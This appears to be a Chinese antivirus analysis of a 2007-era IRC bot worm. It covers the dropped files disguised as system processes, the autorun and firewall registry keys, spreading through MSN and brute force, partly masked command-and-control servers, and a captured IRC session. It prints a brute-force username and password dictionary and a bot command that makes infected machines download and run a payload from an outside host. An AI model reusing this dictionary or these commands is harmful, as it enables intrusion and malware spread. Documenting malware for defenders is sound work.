|
本地行为:
1、文件运行后会衍生副本:
%System32%\*.exe
%System32%\*.rar
/*字符‘*’代表任意多个字符,*.exe病毒名从自身字符串序列中随机选取*/
lssas.exe"
Isass.exe"
csrs.exe"
logon.exe"
winIogon.exe"
explorer.exe"
winamp.exe"
firewall.exe"
spoolsvc.exe"
spooIsv.exe"
algs.exe"
iexplore.exe"
//*.rar文件名从下列字符串中选取
game
video
photoalbum
2、新增注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
\Services\SharedAccess\Parameters\FirewallPolicy
\StandardProfile\AuthorizedApplications\List\
键值:"%WINDIR%System32\explorer.exe"
字符串"%WINDIR%System32\explorer.exe:*:Enabled:Windows Explorer"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
键值:Windows Explorer
字符串"%WinDir%\System32\explorer.exe"
/*病毒名并不一定,参考第一项注释*/
3、如有MSN程序存在,则向联系人发送病毒副本video.rar,此病毒测试用的MSN版本
为最新的8.1(Build 8.1 0178.00);发送的文件名从病毒体自带字符串中选取,参
数第一项注释:
4、病毒生成自删除.bat文件,用于在衍生病毒副本后,删除自身:
通过自带字典枚举用户名与密码试图传播:
用户名表:
staff 、teacher、owner、 student、intranet、 main、
office、control、 siemens、compaq、dell、cisco、
oracle、
data、 access、 database、domain、backup、
technical、mary、 katie、 kate、george、eric、
none、 guest、 chris、 neil、 brian、 susan、luke、
peter、john、 mike、 bill、 fred、wwwadmin、oemuser、
user、 homeuser、home、 internet、root、server、
linux、 unix、 computer、admin、 admins、administrat 、
administrateur 、administrador、administrator
密码列表:
Winpass、blank、nokia、 orainstall、sqlpassoainstall、
db1234、databasepassword、databasepass、dbpassword 、
dbpass 、domainpassword 、domainpass 、hello、hell、
love、money、 slut、 bitch 、fuck 、exchange 、
loginpass、login 、win2000、winnt、winxp 、win2k、
win98 、windows 、oeminstall、accounting、accounts 、
letmein、outlookmail 、qwerty、temp123、temp、null、
default、changeme、demo、 test 、 2005、 2004 、
2001 、 secret、 payday、 deadline、work、 1234567890、
123456789、 12345678、 1234567、123456、 12345、
1234 、
pass 、 pass1234、 passwd、 password、 password1
网络行为:
(1)协议:IRC
目的端口:7777
域名或IP地址:n.nadn****.info(67.43.232.**(美国))
(2)协议:IRC
目的端口:6666
域名或IP地址:(67.43.232.** (美国))
(3)协议:IRC
目的端口:5555
域名:n.ircs****.net(67.43.232.**(美国))
Bot启动后与服务器的交互信息如下:
USER mrwxmt mrwxmt mrwxmt :auwgwkmzxqdrfvoo
NICK DwPkIqCi
:hub.18***.com 001 DwPkIqCi :edyou, DwPkIqCi!mrwxmt@本地IP
:hub.18***.com 005 DwPkIqCi MAP KNOCK SAFELIST HCN MAXCHANNELS=80
MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307
:are supported by this server
:hub.18***.com 005 DwPkIqCi WALLCHOPS WATCH=128 SILENCE=15 MODES=12
CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,
psmntirRcOAQKVGCuzNSMT NETWORK=edyou CASEMAPPING=ascii
EXTBAN=~,cqr :are supported by this server
:DwPkIqCi MODE DwPkIqCi :+iRp
MODE DwPkIqCi +xi
JOIN #braz
USERHOST DwPkIqCi
:DwPkIqCi!mrwxmt@222.171.7.*** JOIN :#braz
:hub.18***.com 332 DwPkIqCi #braz :=d4hhWo0HNky1
/vuRXCRNhb7Sf+SmJU3bmw48
NQteMwR
:hub.18***.com 333 DwPkIqCi #braz ryin 1191283243
:hub.18***1.com 353 DwPkIqCi @ #braz :DwPkIqCi
:hub.18***.com 366 DwPkIqCi #braz :End of /NAMES list.
:hub.18***com 302 DwPkIqCi :DwPkIqCi=+mrwxmt@222.171.7.***
MODE #braz +smntu
:hub.18***.com 482 DwPkIqCi #braz :You're not channel operator
JOIN #rs
:hub.18***.com 474 DwPkIqCi #rs :Cannot join channel (+b)
PING :hub.18***.com
PONG :hub.18***.com
连接的IRC服务器列表:
n.nadn****.info
hub.18***.com
n.ircs****.net
加入频道:
#braz
#rs
加入频道后接收指令下载病毒体:
: n.ircs****.net [00|CHN|XP|144635] #game
:!ix.wget -S -s|!ix.wget
http://nad****.info(72.10.167.**)/msnz.exe
/*从指定地地址下载病毒体,衍生到c:\根目录下,
并重命名为iadfd.exe ,立刻执行*/
本Bot支持下列标准IRC指令:
USER %s %s %s :%s
PASS %s
NOTICE %s :
PRIVMSG %s :
响应mIRC如下命令
NOTICE
NICK
USERHOST %s
MODE %s +xi
MODE %s +smntu
JOIN
ERROR
DCC SEND "%s" %d %s %d
响应eggdrop v1.6.16如下命令
SEND
PRIVMSG
MODE
PONG
PONG %s
0041EF04 00000005 C PING
注: %System32% 是一个可变路径。病毒通过查询操作系统来决定当前 System文件夹的
位置。
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings
\当前用户\Local Settings\Temp
%System32% 系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是C:\Windows\System
windowsXP中默认的安装路径是C:\Windows\System32
|
病毒标签:
病毒上报信箱: